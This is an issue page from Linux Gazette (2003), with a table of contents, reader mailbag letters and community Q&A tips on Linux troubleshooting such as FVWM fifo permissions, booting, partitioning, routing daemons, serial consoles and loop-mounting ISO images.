• The MailBag
• More 2-Cent Tips
• The Answer Gang
• News Bytes, by Michael Conry
• An Undeletion Experience, by C.E.C. Artime and J.A. Baro
• I Broke the Console Barrier, by Stephen Bint
• HelpDex, by Shane Collinge
• Ecol, by Javier Malonda
• EcolNet and the escomposLinux.org project, by Javier Malonda
• The Foolish Things We Do With Our Computers, by Mike ("Iron") Orr
• How to E-mail an Encyclopedia, by Graham Jenkins
• Security with PHP Superglobals, by David Lechnyr
• Perl One-Liner of the Month: The Case of the Evil Spambots, by Ben Okopnik
• Qubism, by Jon "Sir Flakey" Harsem
• Programming in Ruby - Part 3, by Hiran Ramankutty
• Debian APT Part 2: Installing Unreleased Software, by Rob Tougher
• Exploring TCP/IP with TCPdump and Tethereal, by Vinayak Hegde
• Is vmWare good for Linux users?, by Alan Ward
• The Back Page

Linux Gazette Staff and The Answer Gang

Editor: Michael Orr
Technical Editor: Heather Stern
Senior Contributing Editor: Jim Dennis
Contributing Editors: Ben Okopnik, Dan Wilder, Don Marti

Linux Gazette, http://www.linuxgazette.com/
This page maintained by the Editor of Linux Gazette, gazette@ssc.com

Copyright © 1996-2003 Specialized Systems Consultants, Inc.

...making Linux just a little more fun!

The Mailbag From The Readers of Linux Gazette

• FvwmCommand (FvwmCommandS)
• Installing Redhat on Dell X200 laptop (via 1394 CD)

FvwmCommand (FvwmCommandS)

Hi all,

Have tried to find a help forum for Fvwm* stuff, but can't find any. My be just tipping me of one is enough.

The problem: Have made an application using FvwmCommand that works fine when running under /root (super user, SU). However, when running under a "normal" user it fails by the FvwmCommand fifos.

[Thomas] I use nothing but fvwm I love it. It would be useful to know which version of fvwm you're running.

My understanding: The FvwmCommandS sets up 2 fifos (C,M) in /var/tmp and always get the permission prw-------. Those fifos doesn't seem to be accessible from none SU.

[Thomas] Yeah -- I checked the Changelog file for fvwm version >=2.3.0, and there was a bug within the FvwmCommand module. However, as of version 2.3.6, it was fixed. I'd upgrade to the latest stable release.

When trying not SU, always get the report:

No such file or directory FvwmCommand error in opening message fifo: Permission denied.

May be this is deliberately from some security point of view, but on the other hand FvwmCommand is "x for all" in my default installation.

Best regards

[Thomas] As Heather goes on to explain, it is most likely a umask problem.

I'm a fvwm fan myself, but I've not used the FvwmCommand module. Generally I just put things on the menus as Exec calls.

However, it sounds like a umask problem; and possibly a permissions problem in the filesystem. /var/tmp, rather like /tmp, should be permissions 1777 (sticky-bit, everybody can see and write and stat things in the directory). The permissions your file got would be sufficient to defend it from other accounts reading it, but should allow the creating account to work with it. Also note that it's not executable; you weren't trying to create a script and then run it, were you? -- Heather

[Thomas] But that's what FvwmCommand can do heather! It's supposed to do that

Is it also supposed to refuse to do it if the result is not marked executable?

For doing, um, dynamic things I like to have a tmp under my homedir, which belongs only to me (mode 0700) so I can do strange things but I don't subject myself to possible nosy other users. Mind you, I don't usually have other users to worry about, but what the heck; I plan some things here that may get put in production elsewhere. -- Heather

Thanks for your answers and appologies for my late
response. Have been away we no net capabilities.

I agree that it looks like a permission problem as is actually reported. There should be no problem with the /var/tmp directory permissions. They are both "rwx" (7) for all.

You don't mention if it's sticky (shows drwxrwxrwt with ls) -- Heather

The problem seems to be related to FvwmCommandS that sets up (I guess) the two Fifos and also sets the permission to prw-------. By the way, what does "P" stand for.

p stands for named pipe. Stdout (standard out) of one process may be set to feed into a pipe, and the program attached to pick up stdin (standard input) from that pipe can use that to do whatever it needs to do next.

Both the programs should have the permission to reach the pipe that has been created; the umask of the fvwmcommand process is probably restricted to prevent nasty side effects. -- Heather

Have tried after FvwmCommandS is spawned to (as SU) change the fifo permissions by all sorts of combinations with no luck. Typically I can get to prwSrwSrw-. In chmod I used "s" but comes out as "S".

That's because it had no execute permission; since the "Suid" shares a space with the "eXecute" bit, a way was needed to show that both are set, or only one of them,

execute but not suid: for owner and group, the first two triplets: rwx

execute AND suid: for owner and group: rws

not execute, but suid. This doesn't make sense for most purposes: for owner and group: rwS

execute but not sticky: for "other", the third triplet: rwx

execute and sticky: for other: rwt

not execute, but sticky. again it's rare for this to be reasonable: for other: rwT

Now, since the suid, exec, and sticky bits don't affect the read or write, those "rw" could really be any of "r-" "-w" "--" or "rw". -- Heather

My version of FvwmCommand is 2.4.7. I do not know what, or how to find out the version of FvwmCommandS.

I do not know that either. Perhaps Thomas Adams or one of the other Answer Gang members can help further. -- Heather

Thanks a lot for the information on permissions. Some of them were new
to me.

Honestly, I have to tell that I have rewritten the application in order not to use FvwmCommand, but it is still interesting to know where the problem sits. It may be useful in the future.

Just for testing I have done the following (may be someone can do the same ?).

1. I have set the permissions as (a lot shouldn't be needed, but just for test): FvwmCommand: -rwsr-sr-x /var: drwsrwsrwx /var/tmp: drwsrwsrwt
2. FvwmCommandS is spawned by fvwm95 (using that). When spawned I changed (as root) the two fifos permissions to: prwsrwsrwx
3. From an xterm I run: FvwmCommand Restart fvwm95. Works when logged in as root but not as !root user.

Well, as having rewritten the application it is no longer of utmost importance.

The Answer Gang has been of a lot of help in the past. Thank you all.

Best regards
Hans.

During this thread I cc'd the Answer Gang back in so the entire Gang can help you out here. Any one of us could go underwater with complicated questions, so we do not "assign techs" to help anybody all alone. Good thing too - nice to have Thomas confirm what I was groping around in the dark about...

... and that's where it comes to you, dear readers. Hans solved his problem, by avoiding it. But if anyone happens to know what it's really up to - was it really a bug in that version, does it really work now? If anyone else out there is using fvwmcommand actively, drop us a line and let us know what you're doing with it. I presume, making FVWM a little more fun

Other articles or replies about making your favorite window manager do cool and weird things are also welcome. If we get enough maybe it could be the month of "The Truly Cool Things We Did To Our Computers" -- Heather

Installing Redhat on Dell X200 laptop (via 1394 CD)

Please help me install Redhat 7.3 on my Dell X200 laptop. This machine has a firewire CD from which I am able to start the install process. However, the install process soon asks for the device from which to do the install (NFS, FTP, Hard disk, etc.).

No option is given for CD. It looks my BIOS can see the 1394 CD but Redhat cannot. I've looked in all the obvious places for 1394 firewire drivers (Redhat, Dell, Linux documentation and discussion sites). Please help. NFS/FTP boot is not an option.

Thanx, Jim Montgomery

[Heather] For that matter, if our readers know any distro that would cleanly install from a firewire CD, let us know. Distro vendors - look forward to more questions like this!

• Thanks for the viewer hints
• The last word on "daemon"
• Booting multiple OS's

Thanks for the viewer hints

I forgot to tell the lads and lassies at Linux.......I got the .max viewer online and downloaded it.......Now I can view my nieces scans without having to fiddle with them......

Again and again, THANKS!

Jack - Chicago

The last word on "daemon"

I have read on the December Linux Gazette (mailbag) another letter about the etimology of "daemon". Usually for this kind of things the ultimate source of knowledge is "The Jargon File" by Eric S. Raymond, aka ESR (aveilable at the URL http://www.tuxedo.org/~esr/jargon) .

At this point he repeats the entry, but you can find it online at: http://tuxedo.org/~esr/jargon/html/entry/daemon.html

The jargon file entry was mentioned in the starter to this thread, which began in the October issue when someone confused about Kylix made a wildly incorrect guess about the origin of "daemon" and was immediately fed all sorts of tasty bits by The Answer Gang. I thought the timing was quite excellent as it arrived perfectly for Halloween. http://www.linuxgazette.com/issue83/tag/1.html

It has since seen replies in November's and December's mailbag http://www.linuxgazette.com/issue84/lg_mail.html http://www.linuxgazette.com/issue85/lg_mail.html which remove the haze of years that a glossary entry generally summarizes out of existence, to describe current usage only. The Jargon File doesn't always do this, but the information lost by not being quite common enough "common knoqledge" before this began to be set down as bits (and eventually paper) sadly does the glazing over quite well enough.

"ultimate" is a strong word and frankly I rarely use it for anything. Anyone who's been in this business long enough knows that to depend upon only one source for your research isn't really "ultimate" at all, and I'm pleased to have drawn some historians out of the woodwork with more complete info than the Gang pulled out of our wizard hats at the end of September.

In fact, I think the Jargon File maintainers may well like to add details from the etymology-of-daemon thread updates to their entry. To make it more likely, I've cc'd their maintainer list. Hi Eric, and everybody

As of press time, I haven't seen an update to this entry in the Jargon File as a result. No worries. It's probably because I didn't follow their posting guidelines more closely... -- Heather

Booting multiple OS's

moral: pay attention during hardware upgrades.

Your answer gang column in issue 85 had an article "Triple Booting" and had 1 segment of a triple boot as Windows 98.

Recently, I decided to upgrade my P3 MB to a P4 at 2.4gz. There was a combo of an Soyo P4vda MB and the P4 2.4gz that I couldn't resist. I did a lot of reading and the installed the MB. I also have a Slackware and Mandrake Linux installation.

On boot up, I got an error message from W98 that initialization of the NDIS had failed and the system had to be rebooted. It turned out that the only way it would boot from that point was in the safe mode. Needless to say, that's like being on a dead end street with no place to go. My 2 Linux installations were not accessible because the Promise card had been removed and they were now on hda and hdb and I couldn't get them to boot.

It seems that W95 & 98 at this speed of a P4 processor can only be made to work by getting a fix from Bill's os. Since my Pc was dead in the water, there was no way this could be done and the alternative was to install WXP. My true instincts said install Linux and to hell with windows.

Anyhow, its all said and done and WXP as far a I am concerned is a piece of crap. I sooner setup a graphics card in Slackware Linux than deal with what XP has to offer.

My reason for this litany of misery is to ward of some poor soul who might have the temptation to use this combo of a P4 2.4gz or higher processor with W95 or W98. You would think that somewhere there would be a flag to warn us but it was only after a call to Soyo, the MB manufacturer, that I learned of this pitfall. People tell us hard Linux is, if I had chosen this combo to install on Linux life would have been a bed or roses.

Bob Lee

x.generalx@verizon.net

• answerguy and tag addresses gone
• Thanks
• Re: virtual beer and feature request

answerguy and tag addresses gone

The answerguy and tag addresses are now gone, "user unknown", bye bye, see ya. Answer Gang, expect a significant decrease in spam. -- Mike

And I suspect a significant amount of rejoicing from our sysadmin, Dan, who has to clean out the spamtrap occasionally... -- Heather

Thanks

I found the back issues of the Gazette included in the Debian CDs. Another hidden gem. This alone was worth the purchase price. I enjoy the format of multiple answers to questions (eg: the answer gang) and I am suprised that other publications have not tried to copy the format. It kind of has the feel of being subscribed to a news list I subscribed to 'Linux Journal' a couple of years ago because of 'linux Gazette'.

I agree, Linux is more fun.

Why don't you advertise your magazine archives? ~ Buy Our Linux Gazette Archives And Get a FREE Debian 3 Disto.~

Heather specifically wanted The Answer Gang to read like an informal conversation, so that's how she edits it. I don't know why nobody else has copied the style. For LJ, it may be because of tradition and space. The Answer Gang takes up a lot of space when printed, and print magazines have only a limited number of pages, so you'd have to drop a couple articles. But people buy LJ for the articles. -- Mike

(curtsy) thanks for the compliment, guys. I figure, a thick enough thread feels a little like an installfest... all these clues flying around at high speed... bonking people occasionally, but all in good fun. -- Heather

As for the Debian CDs, those are handled by the Debian Project and the CD vendors, so it's their job to promote them. We do have LG on the Linux Journal Archive CD (store.linuxjournal.com, under "LJ Archives"). -- Mike

Re: virtual beer and feature request

Can it be possible to append the author bio to the TWDT file. Or maybe make a TWDT for the author bio itself for each issue. I really enjoyed reading the bios .

We'll think about this. One of the purposes of the Author pages is to have the latest contact information and bio; the articles and TWDT would not be changed after publication.

Pehaps I can put the entire bio page (minus the links to previous articles, and minus the large type in the header) at the bottom of the TWDT article, with a note that this information may be old and another link to the Author page.

Thanks for looking into my feature request about the author's bio. What you suggested is exactly what I wanted.

Done, starting in January's issue. -- Mike

...making Linux just a little more fun!

More 2¢ Tips! By The Readers of Linux Gazette

• Re: [LG 84] 2c Tips #2 --or--
  When LILO lies low and you see LI
• Learning Red Hat 8.0 --or--
  Learning about mail
• a new language
• Linux Router ISP Network Ip pool Details
• Why is my connection breaking? --or--
  security = obscurity, in this case
• Headless Linux
• Re: [LG 85] help wanted #2 --or--
  Crashing mystery? Try no DRI
• imac_X-problems
• Compiling Kernel and Installing on a new machine
• Partitioning without setup
• Red Hat 7.3 Installation
• is this the right place?
• Switchboard
• ThumbDrive
• ip address from c program
• Tricky Linux
• Teething problems with a dual boot system
• ISO file?
• Remote X over SSH
• Debian User Worldmap
• Remote control of Linux from Windows

When LILO lies low and you see LI

Adding to the Issue 84 2 cent tip #2 ...

I wish to clarify what the LI result from lilo means.

The often quoted segment from the lilo readme is sort of backwards in both halves of the sentence. When you get LI and nothing else, the second stage loader was NOT loaded. A block of bytes was loaded, but from the wrong location. This wrong block of bytes WAS executed, but since it is garbage nothing is printed.

Neil.

Learning about mail

A continuation of Issue 85, 2 cent tip #10 ...

I have installed RH's 8.0. I'll have to admit I'm in Windows at the moment.

'sokay, that's fixable :> Or if you get really tricky you can convince a good copy of WINE to use the Windows setup, and run mswin apps even when you are in Linux.

Also the e-mail program that came with 8.0 that isn't connected to a browser retrieved my mail, but wouldn't, couldn't send my mail.

That's probably:

Fetching mail from another serv explicitly (via POP3) works. (This is common. Your ISP did all the work setting up and keeping that POP server, your mailer just visits it once in a while.)

Sending mail outbound, no SMTP server is found to talk to. (There are a few browsers which will "speak SMTP" on their own, but they are not very good mailers on the average, for other reasons.)

Adding an SMTP server to your setup is usually quite easy; look for an RPM package named any one of sendmail, qmail, or postfix. (but you only want one of them.)

and I forgot to mention that if your ISP actually gives you the explicit address of an SMTP server to use, say, mail.isp.example.com, then you could try telling that to your mailer, rather than worrying about setting up your own. -- Heather

Thank you for your time.

You're welcome

a new language

Jack asked us a question that was so general Rick answered it with the applicable Linux answer... -- Heather

You lost me on the KPPP Tool and Linux. Linux is an OS, right?

Indeed. Thus the term "Linux Answer Gang", you see.

Now, where did I get your address? I asked some friends about how to get my telephone to operate through the PC. One person sent me a forward with "The Answer Guy" and the address. I believe it to have been a page from an old site that contained pertinent information, but not the site itself. Does this help?

Not nearly as much as it would if you inquired with that person and tracked down the "old site" for us. That would be much appreciated, as we continue to be deluged with misdirected non-Linux queries.

I am self-taught, so do not confuse me with high-altitude techtalk, just the facts.

Self-taught was at one time the only way to learn Linux, back when many of us got started with it, so we sympathise, and now attempt to assist others while, as we say, "Making Linux just a little more fun".

What is my best approach for learning a program language?

Well, first you'd have to install a Linux distribution, of course.

Strictly speaking, most of these languages are available for Windows too, but some of the mswin implementations may be less than perfectly portable, or the documentation may suggest non-portable over portable coding strategies. Go for dual booting, perhaps. -- Heather

You'll find that it comes with an amazing variety of programming language development kits, from C, C++, and Python through tk/tcl, Java, Lisp, and heavens knows what else. I personally maintain a list of Integrated Development Environment software for Linux, here: http://linuxmafia.com/~rick/faq/#idedev . As you'll see, the list has grown to pass 100 entries.

How you would proceed from there would depend on which type of programming language you'd like to use, and what you want to do with it.

Cheers, Rick Moen

Linux Router ISP Network Ip pool Details

Is it possible for me to run Routing Protocols(ospf,BGP,rip) on my Linux Box connected to an ISP (through cable modem) and obtain all the network (including subnetwork ip pool)ip pool range of my ISP.

[JimD] Look for GNU Zebra: http://www.zebra.org It's considered to be the best available package for Linux, and has (I'm told) syntax that's reasonably similar to Cisco's IOS.

[someone else in the Gang expands] Of course you can! This is not your grandpa's operating system, here. OSPF v. 2 and BGP4/4+ are both supported by either the gated daemon or the GNU zebra daemon, both of which should be standard on your Linux distribution. Zebra can also do pretty much every variety of RIP (v.1, v.2, and RIPng). The standard old routed (prounounced "route-dee") daemon can do RIPv1, and gated can do RIPv2. (gated will also do EGP, thrown into the bargain.)

Thanks for replying. But what I wanted exactly to know is that should I need any kind of details from the ISP (like Router ip,ASN...) or any permission from the ISP for my LINUX Router to have a OSPF session with the ISP Router.

With Regards
Jeevan

security = obscurity, in this case

When I go to login with my online stockbroker

I get this:

"Connection to host www15.scottsave.com is broken"

Why do you think that is and what do you think can be done about it?

Let me guess, you're using the Konqueor 3.0 web browser, right? Konq is broken with respect to SSL sites. I have the same problem and I need to find an updated Konq to use or switch to another browser.

I'm not able to verify this; it could just be the same problem as in Konqueror 2.x, where the SSL support is a seperate package (kdebase-crypto under Debian; your distro may vary), and Konqueror only visits non-encrypted URLs if you don't have that package installed. Of course it doesn't bother to say so... an error message like "https: protocol not supported" would have been a little more useful. -- Heather

Galeon and Mozilla will work, but you need to d/l the Personal Security Manager (PSM). I've looked at installing it and it looks like a PITA.

Until I find an updated Konq or install PSM, I use an old version of Netscape (4.x) which works fine.

Headless Linux

I've been looking around and can't find the info I need. How do I configure Linux to run headless with a terminal connected to a serial port?

Not quite headless, with a serial terminal connected. I choose to call the condition "nearly headless", after the phantom named "Nearly Headless Nick" in the Harry Potter series.

Take a look at:

Documentation/serial-console.txt

in the kernel source. This won't get you quite everything you'd get from a console connected. In particular, you don't have access to the BIOS. But if you can get past that, you're pretty much there. You can even tell LILO to use the serial port, as described in the documentation file. No doubt there's also a GRUB option for serial console, if that's the boot loader you're using.

As I understand it, there's at least one card which will even make the BIOS available via a serial port.

Crashing mystery? Try no DRI

Something for rajachemist of Issue 85 Help wanted #2 to try.

Though you never mentioned what your video card was, I will respond since I was having a similar problem with Mandrake Linux 9.0 on my home-built machine. I was getting lockups all the time and yet I could ssh into the box from another machine and see that everything behind the scenes was still running fine. Just X froze, but it also meant that I could not kill it with CTRL-ALT-BACKSPACE. I happened to have an ATI Xpert 2000 video card (Rage 128 chipset). The ONE item that fixed it was that the card does not seem to handle DRI properly. I commented out the line in my XF86Config file that said: load "dri", restarted X and I never saw the problem again. Perhaps your problem is similar.

Drew

imac_X-problems

after using linux for several years now on i-586 I tried to install it on my imac-g4. the problem: I do not get X to run, because of my NVIDIA GeForce4 MX. I am using debian woody for ppc and don't find any hints in the net. can anybody send me a working XF86Config for XFree 4.1.0 or any other help.

It looks like you'll need XFree86 4.2.0 or later, and will have to use the "vesa" driver (not the "nv" driver) in 16-bit mode, which is the only one supported thus far.

As you may know, these things do tend to happen with newly introduced video chipsets, and Nvidia have unfortunately been notably uncooperative with the XFree86 Project.

That they didn't buy into the XFCom release sequence (compatible binaries, source eventually committed to the open source X code tree) and want to roll their own we can understand; but they have to keep up with the Xfree86 codebase or it makes them look slow. And act slow, if one has to back down to the generic servers in order to work... -- Heather

Compiling Kernel and Installing on a new machine

I am in a catch-22 situation. There might be an easy answer for this but I am not able to work around this problem. Sending this problem here.

Server Configuration:


Chipset 440GX
Micron NetFrame 3400
Adaptec 7680 SCSI Adapter (aic7xxx - HBA 6.2.8)
Mylex Raid - DAC960

Software:


RedHat 8.0 - Linux Kernel 2.4.18-14

Problem:

With 2.4.18-14 there is a problem in the kernel which loops on aic7xxx during boot up, hence it does not boot.

Solution:

Compile the latest kernel 2.4.18-20rc4

Catch-22:

I built the latest kernel on my other linux machine and wrote it into a CD ROM. Now how do I transfer it into my NetFrame Server.

I boot into the rescue mode using the installation CD but once in the rescue mode, I am unable to eject the CD. I have tried all possible mount points to eject the cd but to no avail.

1. Is there a any way to transfer the new kernel image into my NetFrame PC? I exhausted all options, i,e network (since it is in rescue mode)
2. Is there a way to disable linux to take control of the CDROM ejection mechanism?

Your help greatly appreciated.

Thanks
Sunil

Suggestions:

• Use a Tom's Root/Boot floppy.
• Burn a bootable CD with the Tom's Root/Boot "El Torito" boot image (and your new kernel, etc. in all that other CD-R space)
• Use the ifconfig and route commands (on just about any rescue CD or floppy) to manually configure your network, then fetch a tarball of the kernel and modules (etc) from any other machine on your network (using mount -t nfs, or wget or an FTP client).
• Install an extra CD-ROM drive .
• Configure a system on your network as a bootp/dhcpd server, install PXELinux, configure it to transfer a custom network rescue kernel and initrd system to your server, then configure the NetFrame to boot using PXE, etc).

(Okay, that last one is way too much effort for way too little gain and the one before that is just plain silly).

Partitioning without setup

Hello,

I would like to know what linux program to get that I could use to repartition a hard drive without going through setup.

Thank You,
Brandon Dean

[Dan] fdisk

See "man fdisk"

[Pradeep] If you want to repartition without losing data, GNU Parted is a great tool. Details at:

http://www.gnu.org/software/parted

You can also use fdisk or diskdruid but both will destroy the data after repartitioning. These two should be installed by default in most of the distributions.

Don't forget to make good backups first -- Heather

Red Hat 7.3 Installation

Friends, Last week I posed a question for booting with 3 OSes. Thank U.

Here I again partitioned ... [lots of stuff about prepared system] I am trying boot from boot disk. It is coming upto "localhost login:" after which GUI screen be displayed. It displays the localhost login: prompt for a second or a half and then hangs. I thought its a problem with monitor sync values. Mine was samsung's samtron 56V model. But in the list specified - no exact match for it. So I opted for the default given (unprobed type)and modified the sync values with the ones given in my monitor manual. (My friends who have already loaded windows, have not even changed the sync values). One of my friend got the same problem. But his system didn't hang but it flashes between blank screen and the text based localhost prompt.

His "chooser" - the GUI login, keeps crashing but the system keeps trying to put it back up. kdm, gdm, xdm, one of those dm thingies. -- Heather

He was able to login. He logged into it with root and modified the Xconfigurator and now works fine.

Plz assist me.

[Pete]

1. press control alt and F1 to get a text login.
2. login as root and run Xconfigurator

If you're hung too hard for that to work, use the boot loader to put yourself in sincgle user mode, then fix the boot runlevel (/etc/inittab default entry) to stay in text mode. For Red Hat flavors that's runlevel 3. Set it back when you'r sure it's fixed, use startx as a user to run X explicitly while experimenting. -- Heather

is this the right place?

If I may. Is this the news group of ssc.com?

I'm the Technical Editor; I'm cc'ing the Gang, so everyone can chime in if they like. -- Heather

Is it better in the future to write linux-questions-only@ssc.com? Will the server accept my e-mail

TIA Jim

Yes. Linux-questions-only accepts queries from anybody; members of the list see all such messages and are expected to answer a few here and there. -- Heather

Just to be clear, this mailing list (linux-questions-only@ssc.com) is owned by Linux Gazette (www.linuxgazette.com), which is published by SSC. However, most of LG's contributors and Answer Gang members are independent volunteers not related to SSC.

There is no single ssc.com mailing list or news group. SSC hosts many mailing lists, some related to our business and others we host as part of our general commitment to Linux and to free software.

Questions about Linux should go to linux-questions-only@ssc.com. Questions about SSC should go to... well, it depends on the question. Send it to info@ssc.com if you're unsure where to direct it.

There is also linux-list, a discussion list about everything Linux (except advocacy or flame wars). linux-list is hosted by SSC and has a strong Pacific Northwest emphasis, but we do have people from other regions and people who have moved away but still want to keep in touch. To subscribe to linux-list or to any of SSC's other public lists, go to http://www.ssc.com/mailman/listinfo .

Switchboard

Dear Answerguy,

[Ashwin] Hi Jack,

There is no longer an answer guy here, but a gang of Linux enthusiasts! We answer queries on Linux in our free time.

I used to have an IBM Aptiva system that had in the bundle a switchboard supplied by Phoenix. I now have an hp pavilion 7850. It has a modem and phone dialer, but I cannot use the telephone through my computer as before. Is there some way to connect to my telephone line for normal surface telephone lines? What would I need to do?

[Ashwin] If you're using Linux, have you tried connecting using the KPPP tool?

[Heather] I'm not sure, but if he means that his computer used to handle the voice lines in his office (and yes, there are such things, which have some cute GUI app to configure them) ... then he may want to play with the program Asterisk, and maybe the hardware "LineJack" or "PhoneJack" by Quicknet, which are telephony cards you add to a computer.

If he just means that his computer needs to reach the internet, then it's true we have a bunch of dialer-helpers (KPPP is one of the better ones; xisp and a few others are out there) ... but he will still need to know some basic things like his ISP's phone number, the username he was assigned, and maybe some connection features like whether they use PAP or CHAP to identify him.

These are all things which his ISP can tell him better than we could.

ThumbDrive

Is it possible to install Linux on a thumb drive(size 120 MB). Or Can I copy selected files from my normal linux installation(RH 7.2 on a 40 GB hard disk) and make the thumb drive bootable independently. What is the best way to do this? I thought of copying files from my normal linux installation.But i am in doubt whether i can boot this drive in this way. Looking forward to your suggestions.

Short answer -- try this:

http://freshmeat.net/projects/runt

A Linux distro optimized for a USB gadget. I like it. So, as long as your BIOS supports booting from USB devices, you should be golden -- Heather

ip address from c program

In reply to LG 85, help wanted #3

I need to identify the ip address of the client fron within a c program

On Solaris

[JimD] Grump. This is a Linux magazine.

trace the incoming connections and:

See attached solaris.getting-ip-address.c.txt

[JimD] If I'm reading it correctly this translates roughly to:

dmesg | tail -1 |  grep " from " | sed -e 's/^.* from //' | cut -c '0-6'

... which could be simplified somewhat in PERL, awk, or Python, and could probably be munged to perform most of the string handling just using bash/Korn parameter substitution magic with something vaguely like:

... | grep " from " | while read line; do
line=${line//#* from /}; ipaddr=${line:0:6}; ...

Note: I'm just using shell syntax here because I consider it the easiest way to express the concept of what you're doing --- a psuedo-code to people like me who use shell extensively.

Unfortunately this code is not close to what the querent was after. He actually wants to have his program do something like:


if my input/output is a tty then:
if my tty is an inet domain socket then:
ask the socket for the remote (source) ip address

... which will involve the isatty(3) library function and the getsockname(2) system call (and some other structs and munging).

There's an example of the code for this in Wietse Venema's TCP Wrappers sources for tcpd. That code is quite portable, well testing (running on almost all mainstream Linux boxes for about a decade, as well as most BSD systems, and many others.

Your code relies on details about how a given system might be logging connections via syslog/klog or similar externalities, and it's inherently a race (other connections may be logged between the time the message gets put in the dmesg ring buffer and the time when his code is scheduled to run).

I'm not much of a C programmer. I've done a little, even having written a simple kernel device driver that's in production use. However, I rely very heavily on reading examples of similar code.

In general when looking for how to do something like this (figure out the remote system's IP address from one of your file descriptors) I try to think about which programs on my system must be doing something similar. Sometimes I run the similar program under strace, even ltrace for some hints. Then I grab their sources and read up on it. (Usually I can use a man -k or two to make a pretty good guess at which library functions or system calls are involved, even without an strace).

George, I hope you don't think I'm being hard on you. I realize that tech support, particularly trying to help people with programming questions, is difficult.

Dave, I hope this helps. I'm assuming you can figure out the actual code on your own. One reason I display my ignorance by telling people how I discovered whatever I'm suggesting is to "teach the world how to fish." I've never written code to use sockname() and hadn't ever noticed it until I did a man -k socket while writing this message.

[Marian]

struct sockaddr_in from;
socklen_t fromlen;

fromlen = sizeof (struct sockaddr_in);

getpeername (fdi, (struct sockaddr *)&from, &fromlen);
printf ("You are %s:%u\n",inet_ntoa (from.sin_addr), (unsigned)ntohs
(from.sin_port));

Tricky Linux

Dear Sir,

After soo many years have I waited to use Linux as my principle OS as we both know how much problems we have to go through with Microsoft. I've waited for years for Linux to be user friendly and finally our prayers have been answered. I have over twenty machines in my department and soon if I'm able to resolve some of the problems with software compatibility and substitutes. I would probably migrate everyone of us to Linux from Windows.

[Kapil] Welcome to the Brave GNU World! But be warned that if you want to administer a network of machines in any world you can't depend on user-friendly parts but only on the sysadmin-friendly parts!

My only problem is right now, I have an NT Server running Exchange 5.0 and our principle desktop was supposed to be NT workstation with Outlook 97. Obviously, as an administrator, I never follow protocols.

[Kapil] Quite a big confession that. Would other sysadmins be as honest and own up?!

I had Windows 2000 with Outlook 2000 and it worked perfectly. Now that I have installed Red Hat Linux workstation, I successfully connected to the server via DHCP and I can easily surf. But what I can't do is check my email through Ximian Evolution Email Service. My domain is MARS and the server name is MAIN. In exchange, we have IMAP4 and POP3. In Linux, I tried to configure the Ximian Evolution as IMAP.MAIN.COM and POP3.MAIN.COM. Ofcourse we don't have extranet so we can't browse through the Browser. It doesn't work. I even tried my login name with the hostname and it still doesn't work. Can you help me ?

Thanks.

Hritesh

[Kapil] Obviously you have confused Win NT domains with DNS domains. To have a DNS domain (which you don't seem to need since you have no extranet) you need to have an authoritative DNS name server.

If your entire network is only served through Win NS you should check up the documentation on Samba to configure your machine as a Win NS client. You can stick with localhost.localdomain for your DNS name unless you want to be more imaginative!

[Halb] Maybe you should look into Ximian Connector, it will enable to use Evolution as a complete Exchange client. Ximian will be happy to sell you these at $69.00 a piece, but this sholud not be a real problem for a company....... if this is the solution to your problem. Maybe Kapil Hari Paranjape's answer is more the direction you should be looking at.

Teething problems with a dual boot system

Hi there, I was wondering if you could help me out here. I have a dual boot system running XP and red hat 8.0. I have just recently installed red hat and am finding a few problems whilst setting up the system. My computer has 2 physical hard disks (primary master, and secondary master) the first (hda1) has that nasty windows thingy on it (I left the file system as fat32 so I could go back to 98se if need b). Hda2 has red hat on. I can mount and access hda1 when in Linux, but I cannot access my second (fat32) hard drive at all. I have all my operating systems and software on the first hard drive and all my work on the second, so this is starting to wind me up a bit now!

It's not entirely clear if he can still see that work drive from Windows; if he can, Halb's probably right. John K's hints are good before someone starts setting up, so people can have better results. It may also be worth noting that hda2 is the second partition on the first drive; a second drive on the same IDE chain would be hdb, and its partitions also numbered, so maybe he just needs to mount /dev/hdb1 as well.

NT filesystem support for Linux, claiming to read all versions: http://linux-ntfs.sourceforge.net -- Heather

[Halb] By the look of things I would say you have NTFS on your second Harddrive. This is common behaviour on M$ machines becouse FAT23 partition sizes are artificialy restricted to 32 Gigs ( not that big for nowaday harddrives) M$ will automagicly change to NTFS, this might be the reason why you are not able to mount it. This presumes that you have made all the correct entries in your /etc/fstab.

[John] My guess is that perhaps you lost your fat32 partition on the 2nd hd. How did you set up your partition(s) on hda2 when installing RH8? The recommended method would be something like:

• back up the existing partition if it contained anything of interest
• use a non-destructive method of dividing the 2nd hd into multiple partitions (e.g., GNU parted, fips, Partition Magic - there are several to choose from).
• install Linux on a newly-created partition on hd2

also when I re-start my computer I need to mount the hda1 each time. Any help would be greatly appreciated.

[Halb] here you can make an entry for /dev/hda1 like this or whatever your liking is:

/dev/hda1      /WIN2K  vfat    defaults,noatime        0 0

ISO file?

What exactly is an ISO file? I downloaded what i thought was a game and it is an ISO file. Can you convert this into an EXE file? and do ISO files only work on LINUX. Your help will be greatly appreciated thank you.

Lil_P

[Iron] This gets the award for the most frequently-asked question of the month. I think it's the third time somebody has asked how to play .iso games.

ISO9660 is the file format used for CD-ROMs, named after the International Standards Organization's standard that defines it. "ISO" is sometimes used as an abbreviation. Whether that's the format your file is in is a different matter; it could be anything. The .iso extension isn't universal like .txt, .html, .jpg, etc. What does the "file" command say about your file?

Assuming the file is really an ISO9660 filesystem image, you can write it directly to a CD and then either read the CD or boot from it. You'd write the image using "cdrecord" on Linux or one of its GUI front-ends like KOnCD in KDE. Skip the first step (making an image file from a directory hierarchy) because you already have the image.

[Faber] ISO files are binary versions of CDs. If you were to copy a CD byte for byte (NOT file for file), you would have an ISO file.

[Dreamgazer] and how can I open them without copying to cd

When I found out how to do this in Linux I was so impressed with Linux! Let's say you have a directory called /mnt/my_iso and your ISO is called /home/Dreamgazer/my_iso_file. You can mount the ISO with the command:

mount -t iso9660 -o ro,loop=/dev/loop1 /mnt/my_iso /home/Dreamgazer/my_iso_file

and then you can access any of the files in the ISO by going to the /mnt/my_iso directory! Cool, eh?!

Let's see Windows do that !

Actually, just saying -o loop is enough; iso9660 defaults to read-only, and you don't have to tell it which loop device comes next, it can figure it out all alone. I loopback mount CD images a lot myself. I have to make sure not to run out of loops available. -- Heather

[Iron] It may fail for many reasons such as loop device busy (choose another loop device /dev/loop*), your kernel not having loop device support, the /dev/loop* files not existing, etc. When you've finished inspecting the files under /mnt, do:

umount /mnt

to unmount the image (note the command name has one "n" instead of two). See "man mount". A couple details:

